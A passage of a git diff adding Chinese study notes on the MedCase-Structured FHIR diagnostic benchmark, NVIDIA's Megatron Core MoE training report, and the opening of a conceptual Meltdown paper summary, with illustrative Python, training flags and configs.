+MedCase-Structured 解决的是**评测对齐(deployment-aligned benchmarking)**:用合成、公开、FHIR 原生的患者数据,在保护隐私的前提下模拟真实 CDSS 输入。 + +--- + +## 为什么重要 + +### 1. 真实 EHR 与论文基准之间的裂缝 + +- **MIMIC-IV** 等真实 EHR 受隐私与许可限制,且原始形态并非部署中的 FHIR 输出;MIMIC-IV-FHIR 是事后映射,不是临床系统实时产物。 +- **MedQA / MMLU 医学子集** 等多为短 vignette 或选择题,缺少资源引用、编码体系和纵向字段。 +- **Synthea** 能批量造 FHIR,但靠预定义模块与启发式规则,难以覆盖罕见、非典型、高难度的诊断推理病例。 + +### 2. 输入表示会显著改变模型表现 + +论文引用 EHRStruct、FHIR-AgentBench 等工作的结论:**同一临床任务,换输入格式或评测协议,LLM 分数可大幅波动**。MedCase-Structured 用同一病例的「文本版 vs FHIR 版」做对照,直接量化这一差距。 + +### 3. 术语幻觉是 text-to-FHIR 的主战场 + +流水线失败统计里,**LOINC / RxNorm 幻觉编码**、非特异性药名(如「口服抗生素」)、语义映射过细/类别错误占绝大多数。没有 **terminology grounding + repair**,合成 FHIR 无法用于严肃评测。 + +--- + +## 核心概念 + +### 1. FHIR R4 与 Bundle + +**FHIR**(Fast Healthcare Interoperability Resources)是 HL7 的医疗数据交换标准。**R4** 是当前广泛部署的版本。一个病例在 MedCase-Structured 里通常是一个 **`Bundle`**,内含多条 `entry`,每条指向一种资源: + +| 资源类型 | 临床含义(简化) | +|----------|------------------| +| `Patient` | 人口学:姓名、性别、出生日期 | +| `Encounter` | 就诊:门诊/住院、时段、就诊原因 | +| `Condition` | 诊断或症状条目 | +| `Observation` | 体征、实验室结果 | +| `MedicationRequest` | 用药医嘱 | +| `Procedure` | 操作/手术 | +| `DiagnosticReport` | 检查报告 | +| `AllergyIntolerance` | 过敏史 | +| `FamilyMemberHistory` | 家族史 | +| `Immunization` | 免疫接种 | + +资源之间用 `subject.reference: Patient/{id}` 等字段**链接**,形成图结构——这正是 LLM 阅读纯文本时不常遇到的认知负担。 + +### 2. 三阶段固定 LLM 流水线(非 Agent 随意调工具) + +与 Infherno 等 **agent 自主决定何时调工具** 不同,本文流水线在**三个固定阶段**调用 LLM,其余为确定性校验: + +```text +自由文本病例 + → [Stage 1 抽取] 中间表示(人口学、症状、化验、用药… + 每项原文 quote) + → [术语接地] SapBERT + FAISS 对 SNOMED/LOINC/RxNorm/CVX 校验/替换/拒绝 + → [Stage 2 合成] 按 HL7 R4 模板生成 FHIR 资源 + → [结构校验 + 修复循环] 最多 3 轮把 validation errors 喂回 LLM + → [规则后处理] 补全缺失资源、归一化单位/日期/状态 + → [Stage 3 泄漏检测](可选)语义扫描 narrative 字段,清除残留诊断线索 + → 输出 Bundle +``` + +**术语接地**使用 [SapBERT](https://arxiv.org/abs/2010.11784) 嵌入 + [FAISS](https://arxiv.org/abs/1702.08734) 近邻搜索,按余弦相似度阈值决定:接受原码、替换为库内标准码、或拒绝。 + +### 3. 诊断隐藏(Diagnosis Hiding)——评测 CDSS 的关键开关 + +真实 CDSS 不应「偷看」已写入 EHR 的最终诊断。论文提供四种模式: + +| 模式 | 行为 | +|------|------| +| `NONE` | 移除所有诊断结论 | +| `HIDDEN` | 仅隐藏主诊断(评测常用) | +| `EXPLICIT` | 只保留患者自述病情 | +| `FULL` | 保留全部抽取诊断(用于分析泄漏) | + +`NONE` / `HIDDEN` 下先做编码与子串过滤,再用第三阶段 LLM 扫 narrative,去掉缩写、隐含结论等同义词。 + +### 4. 与 MedCaseReasoning 的关系 + +[MedCaseReasoning](https://arxiv.org/abs/2505.11733) 每条样本含: + +- `case_prompt`:尚未给出鉴别诊断前的病例呈现 +- `diagnostic_reasoning`:带文献引用的编号推理链 +- `final_diagnosis`:金标准诊断 + +MedCase-Structured **保留诊断难度与专科分布**,把 `case_prompt` 转成 FHIR;评测时对比 **MCR(文本)** 与 **MCS(FHIR)** 同一问题的准确率。 + +### 5. 过滤与失败模式(读数字时必看) + +进入流水线的病例会先排除:非人类(兽医报告)、多患者、强依赖影像学描述(生成器暂不支持)等。 + +| 划分 | 原始 | 最终可用 | +|------|------|----------| +| Test | 897 | 95 | +| Val | 500 | 50 | +| Train | 13,092 | 1,263 | + +测试集从 897 掉到 95,主因是 **imaging excluded**(777 例),不是流水线全面崩溃。读论文表格时要区分「全库」与「可评测子集」。 + +--- + +## 实验结果:结构化输入更难 + +在诊断隐藏设定下,用 GPT-5.4 作 LLM-as-judge 比较预测诊断与金标准是否临床等价: + +| 模型 | MedCaseReasoning(文本) | MedCase-Structured(FHIR) | Δ | +|------|--------------------------|----------------------------|---| +| GPT-5.4 zero-shot | 65.26% | 61.05% | −4.21 | +| GPT-5.4 1-shot | 74.74% | 51.58% | **−23.16** | +| Gemini-3.1-Pro zero-shot | 58.95% | 52.63% | −6.32 | +| Claude-Opus-4.6 zero-shot | 68.42% | 53.63% | −14.79 | + +**Few-shot 在文本上提升明显,在 FHIR 上反而可能更差**——模型或许把 shot 里的叙事模式错误迁移到 JSON 结构上。这强化了:**部署前必须在目标数据形态上评测**。 + +--- + +## 代码示例 1:读懂 Bundle 骨架(Python) + +下面用最小脚本加载一条 FHIR Bundle,列出资源类型与 SNOMED 编码——这是 MCS 评测前「人类/模型在看什么」的第一步: + +```python +import json +from pathlib import Path +from collections import Counter + +def summarize_bundle(bundle_path: str) -> None: + bundle = json.loads(Path(bundle_path).read_text()) + assert bundle["resourceType"] == "Bundle" + types = Counter() + snomed_codes = [] + for entry in bundle.get("entry", []): + res = entry.get("resource", {}) + rtype = res.get("resourceType", "?") + types[rtype] += 1 + # 递归收集 SNOMED coding(教学用简化版) + def walk(obj): + if isinstance(obj, dict): + if obj.get("system") == "http://snomed.info/sct": + snomed_codes.append(obj.get("display") or obj.get("code")) + for v in obj.values(): + walk(v) + elif isinstance(obj, list): + for item in obj: + walk(item) + walk(res) + print("Resource counts:", dict(types)) + print("SNOMED concepts (sample):", snomed_codes[:8]) + +# 假设从 MedCase-Structured 仓库解压的单例 +summarize_bundle("cases/test/case_00042.bundle.json") +``` + +实战中你会看到:`Encounter.reasonCode`、`Condition.code`、`Observation.code` 分散在不同资源里——模型必须把**跨资源证据**合成诊断,而不是读一段连贯叙述。 + +--- + +## 代码示例 2:复现评测提示结构(诊断任务) + +论文附录 B 规定模型输出 JSON:`diagnosis` + `reasoning`。下面用伪代码展示 **FHIR 输入** 与 **文本输入** 如何共用同一套评测壳(便于自己跑 ablation): + +```python +import json + +SYSTEM = ( + "You are a careful physician solving clinical diagnostic reasoning cases. " + "Use only the provided case information. Return valid JSON only." +) + +def build_user_prompt(case_input: str, *, mode: str) -> str: + if mode == "fhir": + header = "You will receive a FHIR Bundle JSON for a clinical case." + body = case_input # 完整 Bundle JSON 字符串 + elif mode == "text": + header = "You will receive a plain text clinical case description." + body = case_input # MedCaseReasoning case_prompt + else: + raise ValueError(mode) + schema = ( + 'Return exactly this JSON schema: ' + '{"diagnosis": "single most likely diagnosis", ' + '"reasoning": "brief explanation using the case evidence"}' + ) + return f"{header} Determine the most likely final diagnosis. {schema}\n\n{body}" + +def parse_model_json(raw: str) -> dict: + # 生产环境应加 jsonschema 校验与重试 + return json.loads(raw) + +# FHIR 路径 +fhir_bundle = open("case_00042.bundle.json").read() +prompt_mcs = build_user_prompt(fhir_bundle, mode="fhir") + +# 文本对照路径(同一病例的 case_prompt) +text_case = open("case_00042.prompt.txt").read() +prompt_mcr = build_user_prompt(text_case, mode="text") + +# 下游:调用 API → parse_model_json → GPT-5.4 judge 比较 final_diagnosis +``` + +若你微调 CDSS,应分别在 `prompt_mcr` 与 `prompt_mcs` 上报告指标,而不是只报文本侧「好看」的数字。 + +--- + +## 代码示例 3(加分):术语接地思路(概念片段) + +论文用 SapBERT 向量 + FAISS 做「码表对齐」。下面不是论文源码,但说明 **replace / reject** 决策逻辑: + +```python +import numpy as np + +def cosine(a: np.ndarray, b: np.ndarray) -> float: + return float(np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b) + 1e-9)) + +def ground_code( + mention: str, + llm_code: str, + llm_display: str, + faiss_index, # 预建:标准术语 SapBERT 向量 + term_table: list[dict], + thresholds: tuple[float, float] = (0.85, 0.70), +) -> str | None: + """高相似度接受;中间带替换;过低拒绝(返回 None 触发修复循环)""" + emb = encode_sapbert(mention) # 与论文一致的生物医学句向量 + sims, idxs = faiss_index.search(emb.reshape(1, -1), k=5) + best_sim, best_idx = float(sims[0][0]), int(idxs[0][0]) + canonical = term_table[best_idx] + if llm_code == canonical["code"] and best_sim >= thresholds[0]: + return llm_code + if best_sim >= thresholds[0]: + return canonical["code"] # 替换幻觉码 + if best_sim >= thresholds[1]: + return canonical["code"] # 弱匹配仍替换 + return None # 拒绝 → 进入 LLM repair +``` + +非特异性表述(「口服抗生素」)常在 `thresholds` 下被拒——这也是 Table 2 里 RxNorm 失败高发的原因。 + +--- + +## 与相关工作的对比(选型表) + +| 方案 | 优势 | 局限 | +|------|------|------| +| **MIMIC-IV / FHIR 衍生** | 真实分布 | 隐私、许可、非原生 FHIR 工作流 | +| **Synthea** | 大规模合成 FHIR | 规则驱动,难控复杂罕见病例 | +| **FHIR-GPT / Infherno** | 笔记→FHIR 重建 | 偏「忠实还原」,非可控评测集生成 | +| **EHRStruct / FHIR-AgentBench** | 结构化 EHR 任务基准 | 固定数据,难按需生成新场景 | +| **MedCase-Structured** | 医生病例 + 术语校验 + 诊断隐藏 + 文本/FHIR 对照 | 资源类型子集、纵向轨迹简化、成像信息过滤 | + +--- + +## 局限与未来方向(论文自述) + +1. **FHIR 资源覆盖不全**:长线病程用重复、带日期的资源近似,而非完整 temporal graph。 +2. **术语库缝隙**:LOINC 化验名口语化、疫苗商品名(CVX)、非特异性药物类仍易失败。 +3. **成像依赖病例被排除**:放射/病理描述重的病例无法进入当前生成器。 +4. **合成 ≠ 真实**:术语接地错误会传导到下游评测,需与真实世界验证互补。 + +未来工作:扩展资源类型、加强纵向建模、扩大术语表、上下文感知校验。 + +--- + +## 谁应该读这篇论文 + +| 角色 | 收获 | +|------|------| +| **医疗 NLP / CDSS 研究者** | 部署对齐评测范式、text-to-FHIR 流水线设计 | +| **FHIR 工程师** | Bundle 组装、编码接地、诊断泄漏模式 | +| **LLM 评测从业者** | 同一任务多表示(text vs JSON)的对照实验模板 | +| **医院信息科** | 理解为何「接口标准化」不等于「模型自动变强」 | + +--- + +## 速查清单 + +1. **FHIR R4 Bundle** = 多资源 JSON 图,不是单段病历。 +2. **三阶段 LLM + 确定性接地/校验**,不是端到端一次性生成。 +3. **诊断隐藏**是评测 CDSS 的必要条件,否则标签泄漏。 +4. **82.5%** 是流水线成功率;**test 95 例**才是常用评测子集。 +5. **FHIR 输入准确率低于文本**是主结论,不是边角料。 +6. 数据集:[github.com/SystemInternal/MedCase-Structured](https://github.com/SystemInternal/MedCase-Structured) +7. 上游病例:[github.com/kevinwu23/Stanford-MedCaseReasoning](https://github.com/kevinwu23/Stanford-MedCaseReasoning) + +--- + +## 参考文献 + +```bibtex +@article{buimuti2026medcase, + title={MedCase-Structured: A Text-to-FHIR Dataset for Benchmarking + Diagnostic Reasoning in Clinically Realistic EHR Settings}, + author={Bui Muti, Valentina and Dulout, Eug{\'e}nie and Fu, Ziquan}, + journal={arXiv preprint arXiv:2605.30295}, + year={2026}, + url={https://arxiv.org/abs/2605.30295} +} + +@inproceedings{wu2025medcase, + title={MedCaseReasoning: Evaluating and Learning Diagnostic Reasoning + from Clinical Case Reports}, + author={Wu, Kevin and Wu, Eric and Thapa, Rahul and others}, + booktitle={NeurIPS}, + year={2025}, + url={https://arxiv.org/abs/2505.11733} +} +``` + +--- + +## 一句话带走 + +**MedCase-Structured 把「医生写的病例故事」翻译成「医院信息系统里会长什么样」的 FHIR,并证明:大模型在后者上的诊断推理明显更难——做临床 AI 必须在 FHIR 形态上评测,而不能只刷文本病历榜。** diff --git a/src/content/docs/papers/megatron-core-moe-2026.md b/src/content/docs/papers/megatron-core-moe-2026.md new file mode 100644 index 000000000..c64bb5a04 --- /dev/null +++ b/src/content/docs/papers/megatron-core-moe-2026.md @@ -0,0 +1,339 @@ +--- +title: Megatron Core MoE 大规模训练 — 零基础学习笔记 +来源: https://arxiv.org/abs/2603.07685 +日期: 2026-06-13 +分类: 机器学习 +子分类: ML 系统 +provenance: pipeline-v3 +--- + +## 从日常类比开始:专科会诊中心 vs 总机接线 + +想象你要运营一家**超大型连锁医院**(千卡 GPU 集群),里面有两种科室: + +- **Attention 层**像**总机 + 全科医生**:每个病人(token)都要和当天所有在院记录(上下文)对一遍话——计算模式**密集**,适合把同一份病历拆给几位医生并行看(**Tensor Parallelism, TP**)。 +- **MoE 专家层**像**32 个专科门诊**:每个病人只被分到 **Top-K 个专家**会诊——总「名医库」很大,但单次会诊只开几间诊室。若把每位专家再切成碎片(对专家矩阵做 TP),单次 GEMM 更小、GPU 更闲;更自然的做法是**把不同专家放到不同 GPU**(**Expert Parallelism, EP**),再在 GPU 之间**派单、收单**(all-to-all 通信)。 + +旧训练框架的问题,相当于**强迫总机和专科门诊共用同一套排班表**:传统约束要求 `EP ≤ DP`(专家并行度不能超过数据并行度),Attention 想要 `TP=4` 时,MoE 层的 EP 也被迫受限——**dense 层和 sparse 层的最优拓扑互相打架**。 + +NVIDIA 2026 年 3 月发布的技术报告 **《Scalable Training of Mixture-of-Experts Models with Megatron Core》**(arXiv:[2603.07685](https://arxiv.org/abs/2603.07685))系统总结了 **Megatron-Core MoE** 栈:用 **Parallel Folding** 给 Attention 和 MoE **各排各的班**,再叠加内存、通信、计算三面优化,在 GB200/GB300 上把 DeepSeek-V3-685B、Qwen3-235B 推到 **900–1200+ TFLOPS/GPU** 量级。 + +一句话:**MoE 训练不是「把 dense 训练脚本多加几个 expert 参数」——而是 memory × communication × compute 的系统共设计。** + +--- + +## 是什么 + +| 项目 | 内容 | +|------|------| +| 类型 | 技术报告(Technical Report) | +| 机构 | NVIDIA | +| 代码 | [NVIDIA/Megatron-LM](https://github.com/NVIDIA/Megatron-LM) 的 `megatron/core/transformer/moe/` | +| 关联论文 | [MoE Parallel Folding (2504.14960)](https://arxiv.org/abs/2504.14960) | +| 验证模型 | DeepSeek-V3、Qwen3-235B、Mixtral、Qwen2/3 系列等 | +| 规模 | 数十亿到**万亿**参数、**数千 GPU** 集群 | + +报告不是提出新的 MoE 路由算法,而是回答:**在真实硬件上,如何把 MoE 训快、训稳、训得起。** + +--- + +## 为什么重要 + +### 1. MoE 改变了「参数」与「算力」的关系 + +Dense 模型:参数量 N 与每 token FLOPs 大致同阶增长——加卡、加算力比较「齐步走」。 + +MoE 模型:总参数可以 685B,但每 token 只激活 ~37B(DeepSeek-V3,约 **18×** 差距)。**显存要装下全部专家**,**算力却只跑一小撮**——于是出现报告里的 **parameter-compute mismatch(参数-计算错配)**。 + +### 2. 三面墙(Three Walls)彼此牵连 + +| 墙 | 典型症状 | 只修一面会怎样 | +|----|----------|----------------| +| **Memory Wall** | 激活 > 权重;DeepSeek-V3 单卡激活可达 **131 GB** | 开 recomputation 省内存 → 通信占比暴露 | +| **Communication Wall** | EP all-to-all 占 **20–60%** 迭代时间 | overlap 通信 → 专家 GEMM 太短,overlap 吃不饱 | +| **Compute Wall** | 小 batch、多专家 → kernel 碎片化、MFU 低 | 上 CUDA Graph → 与 dropless 动态 shape 冲突 | + +Megatron-Core 的核心主张:**三面要一起调**,不能「头痛医头」。 + +### 3. 工业界事实标准栈 + +DeepSeek-V3、Qwen3 等模型的**预训练配置**大量出现在 Megatron-MoE-Model-Zoo;读这篇报告 ≈ 读当前大规模 MoE **系统最佳实践清单**。 + +--- + +## 核心概念 + +### 1. MoE 层四阶段前向(Route → Dispatch → Compute → Combine) + +Megatron-Core 把 MoE 层拆成模块化流水线: + +```text +输入 tokens + → [1 Route] Router 选 Top-K 专家 + 路由权重 + → [2 Dispatch] 按专家 permute + 跨 GPU 搬运(all-to-all / DeepEP / HybridEP) + → [3 Compute] 本地专家 Grouped GEMM(TEGroupedMLP) + → [4 Combine] 加权聚合 + unpermute 回原 token 顺序 +``` + +**Router、Dispatcher、Experts** 可独立优化:换 dispatcher 不必改 expert 内核;expert 换 FP8 后端不必动 router 融合。 + +### 2. 五维并行 + Parallel Folding + +传统 Megatron **dense** 并行:**TP、PP、DP、CP(Context Parallel)**。 + +MoE 再加第五维:**EP(Expert Parallel)**——每个 rank 持 `E/EP` 个专家。 + +**Parallel Folding** 为 Attention 与 MoE **分别定义进程组**: + +| 层类型 | 典型符号 | 含义 | +|--------|----------|------| +| Attention | TP, CP, DP | 与 dense Transformer 类似 | +| MoE | **ETP**, **EP**, **EDP** | Expert Tensor / Expert / Expert Data Parallel | + +关键突破:**打破 `EP ≤ DP`**。MoE 的 EP 可以「折叠」到 Attention 的 `TP × CP × DP` 子组之上。 + +**示例(报告 Figure 5 思路)**:256 GPU,`PP=4`,Attention 侧 `TP=4, CP=2, DP=8`;MoE 侧可设 `ETP=1, EP=64, EDP=1`——专家并行度是旧约束下的 **8×**。 + +### 3. Token Dispatcher 三种后端 + +| 类型 | 特点 | 适用 | +|------|------|------| +| **AllGather** | 实现简单 | 小规模、调试 | +| **all-to-all** | NCCL 标准 EP 通信 | 通用 | +| **Flex(DeepEP / HybridEP)** | 针对 NVLink / 跨节点优化 | H100、B200、GB200 生产 | + +HybridEP 在 GB200 上对 hidden=7168、seq=4096、256 experts 等配置,**通信延迟 consistently 低于纯 all-to-all**(跨节点差距更大)。 + +### 4. Grouped GEMM 与 dropless MoE + +每个 GPU 上多个专家的小 GEMM 若逐个 launch,SM 利用率极差。**Grouped GEMM** 把「同一 rank 上所有专家的 MLP」合成一次 batched GEMM(Megablocks / Tutel / Transformer Engine 路线)。 + +**Token dropless(dMoE)**:不丢弃过载 token,允许动态每个 expert 收到不同 token 数——更保真,但 shape 动态,与 **CUDA Graph** 冲突;Megatron 用 **sync-free execution**、细粒度 graph scope(如只 capture attention)折中。 + +### 5. 内存优化组合拳(DeepSeek-V3 单卡 BF16 示意) + +报告 Table 3:`PP4 × VPP4 × EP64`,256 GPU,**未优化前 ~199.5 GB/GPU**(远超 H100 80GB): + +| 组件 | 占用 | 主要手段 | +|------|------|----------| +| 权重+梯度 | 36.4 GB | PP / EP / TP 分片 | +| 优化器状态 | 32.1 GB | Distributed Optimizer、BF16 moments、FSDP+EP | +| **激活** | **131.0 GB** | FP8/NVFP4、细粒度 recomputation、offload、Memory-Efficient Permutation | + +**Memory-Efficient Permutation**:把 router 概率 `p_i` 从「专家输出后乘」改到「SwiGLU 激活后、第二层线性前乘」——数学等价(无 bias 时),却少存一份 expert 输出用于反传,DeepSeek-V3 上约 **省 26.3 GB** 激活,**零额外算力**。 + +### 6. 低精度:FP8 / NVFP4 + +MoE 训练支持 blockwise FP8、NVFP4:线性层输入存低精度 → 激活内存 **减半或 1/4**;通信量也可下降;Tensor Core GEMM 加速。需 **selective precision**(router、norm 等仍 BF16)保收敛。GB200 上 DeepSeek-V3 优化配置可达 **1048 TFLOPS/GPU**(Table 17)。 + +### 7. 性能数字(报告摘要) + +| 模型 | 平台 | TFLOPS/GPU(报告峰值) | +|------|------|------------------------| +| DeepSeek-V3-685B | GB300 / GB200 | **1233 / 1048** | +| Qwen3-235B | GB300 / GB200 | **974 / 919** | +| DeepSeek-V3 | H100 ×1024 | **368**(配置不同,跨节点 EP 更重) | + +另:Parallel Folding 论文在 H100 上 Mixtral 8×22B 约 **49.3% MFU**,Qwen2-57B-A14B 约 **39.0% MFU**。 + +--- + +## 代码示例 + +### 示例 1:用 Python 模拟 MoE 四阶段与 EP 派单 + +下面不是 Megatron 源码,而是帮助理解 **Route → Dispatch → Compute → Combine** 与 **EP 分片** 的最小模型: + +```python +import torch +from collections import defaultdict + +NUM_EXPERTS = 8 +TOP_K = 2 +EP_SIZE = 4 # 4 个 GPU,每 rank 2 个专家 +HIDDEN = 16 + +# 模拟 6 个 token、随机 router logits +tokens = torch.randn(6, HIDDEN) +logits = torch.randn(6, NUM_EXPERTS) +weights, experts = torch.topk(logits, TOP_K, dim=-1) +route_w = torch.softmax(weights, dim=-1) + +def ep_rank(expert_id: int) -> int: + """专家 e 落在哪个 EP rank""" + return expert_id // (NUM_EXPERTS // EP_SIZE) + +# --- Stage 1: Route(已完成:experts, route_w)--- + +# --- Stage 2: Dispatch — 按 (rank, expert) 分桶 --- +buckets = defaultdict(list) # (rank, local_expert) -> [(token_idx, weight)] +for t in range(tokens.size(0)): + for k in range(TOP_K): + e = experts[t, k].item() + r = ep_rank(e) + local_e = e % (NUM_EXPERTS // EP_SIZE) + buckets[(r, local_e)].append((t, route_w[t, k].item())) + +print("Dispatch buckets (rank, local_expert) -> token indices:") +for key, pairs in sorted(buckets.items()): + print(f" {key}: {[p[0] for p in pairs]}") + +# --- Stage 3: Compute — 每 rank 上对本地专家做 MLP(此处用恒等映射示意)--- +expert_out = torch.zeros_like(tokens) +for t in range(tokens.size(0)): + acc = torch.zeros(HIDDEN) + for k in range(TOP_K): + acc = acc + route_w[t, k] * tokens[t] # 真实场景是 Expert_MLP_e(x) + expert_out[t] = acc + +# --- Stage 4: Combine --- +output = expert_out # 已按 token 顺序聚合 +print("output shape:", output.shape) +``` + +真实训练中,**Dispatch/Combine** 是 NCCL all-to-all 或 DeepEP;**Compute** 是 `TEGroupedMLP` 一次调用多个专家。 + +### 示例 2:Megatron-LM 训练脚本中的 MoE 与性能 flag + +来自官方 `megatron/core/transformer/moe/README.md` 的推荐配置片段: + +```bash +# ===== 基础 MoE 结构(8 专家、Top-2、辅助负载均衡损失)===== +--num-experts 8 +--moe-shared-expert-intermediate-size 2048 +--moe-router-load-balancing-type aux_loss +--moe-router-topk 2 +--moe-aux-loss-coeff 1e-2 + +# ===== Token 派单:生产环境优先 Flex + DeepEP/HybridEP ===== +--moe-token-dispatcher-type flex +--moe-flex-dispatcher-backend deepep # GB200 上可换 hybridep + +# ===== 计算与融合 ===== +--moe-grouped-gemm +--moe-router-fusion +--moe-permute-fusion + +# ===== 并行与通信 overlap ===== +--use-distributed-optimizer +--overlap-param-gather +--overlap-grad-reduce +--overlap-moe-expert-parallel-comm +--delay-wgrad-compute + +# ===== 内存:细粒度 recomputation(mla / moe / norm 等可选)===== +--recompute-granularity selective +--recompute-modules moe moe_act norm +``` + +**Parallel Folding** 具体 TP/EP/PP 组合需按模型与 GPU 显存迭代;Model Zoo 提供 DeepSeek-V3、Qwen3-235B 等参考 config。单机调试可用 `--fake-init-process-group` 在 **1 GPU** 上模拟分布式显存占用,先找「不 OOM 的可行并行度」。 + +### 示例 3:Parallel Folding 配置直觉(伪 YAML) + +```yaml +# 256 × GB200,DeepSeek-V3 风格(报告 Table 17 简化) +cluster: + gpus: 256 + model: deepseek_v3_685b + +attention_parallel: + pipeline_parallel: 4 + tensor_parallel: 4 # 仅 Attention / Dense 部分 + context_parallel: 2 + data_parallel: 8 + +moe_parallel: # Parallel Folding:与 attention 解耦 + expert_tensor_parallel: 1 # 专家不做 TP,保持 GEMM 粒度 + expert_parallel: 64 # 可 > attention DP,打破 EP≤DP + expert_data_parallel: 1 + +dispatcher: + type: flex + backend: hybridep # NVL72 域内 EP + +precision: + compute: fp8_blockwise + optimizer_states: bf16 +``` + +--- + +## MoE 训练调参工作流(报告 Section 9 提炼) + +```text +Step 1 在显存预算内找可行并行度 + → fake-init / 估算 activation、权重、optimizer 三分量 +Step 2 最小化 TP/EP,最大化 DP(通信开销 vs 内存) + → EP×TP 尽量落在单节点 NVLink 域 +Step 3 跨节点优先加 PP,而非把 EP 拉过网络 +Step 4 三面墙迭代:permute 内存 → dispatcher → overlap → Grouped GEMM → FP8 → CUDA Graph +Step 5 长上下文单独调:CP + MLA recomputation + optimizer CPU offload +``` + +**Guideline 记忆点**:MoE 的 EP 通信是 **medium–high** 带宽敏感;Attention 的 TP 是 **high**;PP 跨节点但 activation 不随 EP 分片——**激活常常是调 parallel mapping 的第一约束**。 + +--- + +## 与相关系统对比 + +| 系统 | 侧重点 | +|------|--------| +| **GShard / Switch / GLaM** | MoE 算法与负载均衡先驱 | +| **Tutel / DeepSpeed-MoE** | 早期 MoE 系统优化 | +| **Megatron-Core MoE(本篇)** | 生产级全栈:Parallel Folding + DeepEP/HybridEP + TE Grouped GEMM + FP8/NVFP4 + 长上下文 | +| **vLLM / SGLang** | **推理** serving;本篇是 **训练** | + +训练栈与推理栈问题不同:训练要存 **optimizer + 全量 expert 权重 + 反向激活**;推理只需活跃专家与 KV cache。 + +--- + +## 实践案例 + +### 案例 1:DeepSeek-V3 on GB200(256 GPU) + +- 配置:`PP=4`,Parallel Folding,HybridEP,CUDA Graph(缓解 FP8 下 CPU launch 瓶颈) +- 结果:**1048 TFLOPS/GPU** +- 启示:Blackwell 上 **host 开销** 可能成为新瓶颈,graph 不是可选项 + +### 案例 2:DeepSeek-V3 on H100(1024 GPU) + +- 跨节点 **EP64**,通信占主导 → DeepEP + **EP A2A overlap** + FP8 blockwise +- 结果:**368 TFLOPS/GPU**(仍远低于 GB200,但集群可扩展) +- 启示:**同模型不同硬件 = 不同优化栈**,不能照搬 flag + +### 案例 3:长上下文 256K + +组合 **CP + TP + selective recomputation(MLA up-proj 等)+ optimizer CPU offload**;DeepSeek-V3 在 256 Hopper GPU 上长上下文 MFU 可达短上下文的 **88%**。 + +--- + +## 常见误区 + +1. **「MoE 参数多但算力省,显存应该更省」** — 错。未激活专家权重仍要驻留;激活还随层数、top-k、batch 增长。 +2. **「EP 越大越好」** — 错。EP 增大 → all-to-all 体积与次数上升;需 NVLink 域内或 overlap。 +3. **「全开 recomputation 就行」** — 错。MoE 层整层 checkpoint 会 **重跑 all-to-all**;应 **细粒度**(SwiGLU、LayerNorm、MLA up-proj)。 +4. **「Attention 和 MoE 用同一 TP/DP」** — 旧范式;大模型应评估 **Parallel Folding**。 + +--- + +## 延伸阅读 + +- 报告全文:[arXiv:2603.07685](https://arxiv.org/abs/2603.07685) +- Parallel Folding 细节:[arXiv:2504.14960](https://arxiv.org/abs/2504.14960) +- 代码 README:[megatron/core/transformer/moe/README.md](https://github.com/NVIDIA/Megatron-LM/blob/main/megatron/core/transformer/moe/README.md) +- 预训练 config 参考:[Megatron-MoE-ModelZoo](https://github.com/yanring/Megatron-MoE-ModelZoo) + +--- + +## 小结 + +| 你学到的 | 一句话 | +|----------|--------| +| 参数-计算错配 | 总参数 ≫ 每 token 计算 → 必须 EP,且内存装全量专家 | +| 三面墙 | Memory / Communication / Compute 联动,单点优化会暴露其他瓶颈 | +| Parallel Folding | Attention 与 MoE **分开排并行度**,打破 EP≤DP | +| 四阶段 MoE 层 | Route → Dispatch → Compute → Combine,模块可替换 | +| 系统优化 | Grouped GEMM、DeepEP/HybridEP、细粒度 recomputation、FP8/NVFP4、CUDA Graph | +| 数字 | DeepSeek-V3 **1000+ TFLOPS/GPU**(GB200 级),依赖整栈而非单 trick | + +Megatron-Core MoE 这篇报告的价值,在于把「能训万亿 MoE」拆成**可操作的系统 checklist**——从进程组拓扑到 dispatcher 选型,从 permute 的数学等价变形到 FP8 该存哪些 tensor。下次你看到 `--moe-token-dispatcher-type flex`,知道它背后是 **Communication Wall** 上的一整套工程,而不只是一个 CLI 开关。 diff --git a/src/content/docs/papers/megatron-lm.md b/src/content/docs/papers/megatron-lm.md index 5998c2988..19679fb42 100644 --- a/src/content/docs/papers/megatron-lm.md +++ b/src/content/docs/papers/megatron-lm.md @@ -2,8 +2,8 @@ title: Megatron-LM — NVIDIA 大规模训练框架 来源: 'Shoeybi et al., "Megatron-LM: Training Multi-Billion Parameter Language Models Using Model Parallelism", 2019' 日期: 2026-05-29 -子分类: 模型与训练 -分类: 分布式系统 +子分类: 系统综合 +分类: 基础设施 难度: 中级 provenance: pipeline-v3 --- diff --git a/src/content/docs/papers/meltdown-attack-2018.md b/src/content/docs/papers/meltdown-attack-2018.md new file mode 100644 index 000000000..1a62d32fb --- /dev/null +++ b/src/content/docs/papers/meltdown-attack-2018.md @@ -0,0 +1,266 @@ +--- +title: Meltdown — 从用户空间偷读内核内存 +来源: https://meltdownattack.com/meltdown.pdf +日期: 2026-06-13 +子分类: 安全与隐私 +分类: 安全与隐私 +难度: 中级 +provenance: pipeline-v3 +--- + +## 是什么 + +**Meltdown: Reading Kernel Memory from User Space**(Lipp、Schwarz、Gruss 等,USENIX Security 2018;arXiv [1801.01207](https://arxiv.org/abs/1801.01207))揭示了一类**硬件级信息泄漏**:普通用户程序**不需要 root、不需要内核漏洞**,就能读到操作系统内核映射里的内存——密码、SSH 密钥、别的进程数据都可能被拖出来。 + +官方 PDF:[meltdownattack.com/meltdown.pdf](https://meltdownattack.com/meltdown.pdf)。同日披露的 [[spectre-attack-2018]] 利用**分支预测错误**诱骗受害代码投机执行;Meltdown 更直接——利用**乱序执行**在权限检查完成前就把「不该读的内核地址」搬进 CPU 内部流水线,再用**缓存侧信道**把秘密字节「听」出来。 + +日常类比: + +> 图书馆规定「普通读者不能进珍本室」。你站在阅览室(用户态),照理够不到珍本室书架(内核内存)。但管理员为了提速,会让助理**手快先抽书**——在刷卡系统确认「你有没有权限」之前,书页可能已经翻过几页;发现你没权限后,业务作废、登记本上这笔借阅被划掉,可**书页压在复印机玻璃上留下的压痕**(CPU 缓存访问痕迹)还在。攻击者不闯珍本室,只量复印机哪块玻璃最近被压过,就能反推书页上的字。 +> 现代 CPU 的乱序执行就是那个「手快的助理」;L1/L2 缓存就是「会留下压痕的玻璃」。 + +一句话:**Meltdown 把「为了提速而提前执行的内存访问」变成泄密通道,让操作系统以为牢固的地址空间隔离在微架构层面晚了一步。** + +## 为什么重要 + +不理解这篇论文,下面这些事都讲不清: + +- 为什么 2018 年 1 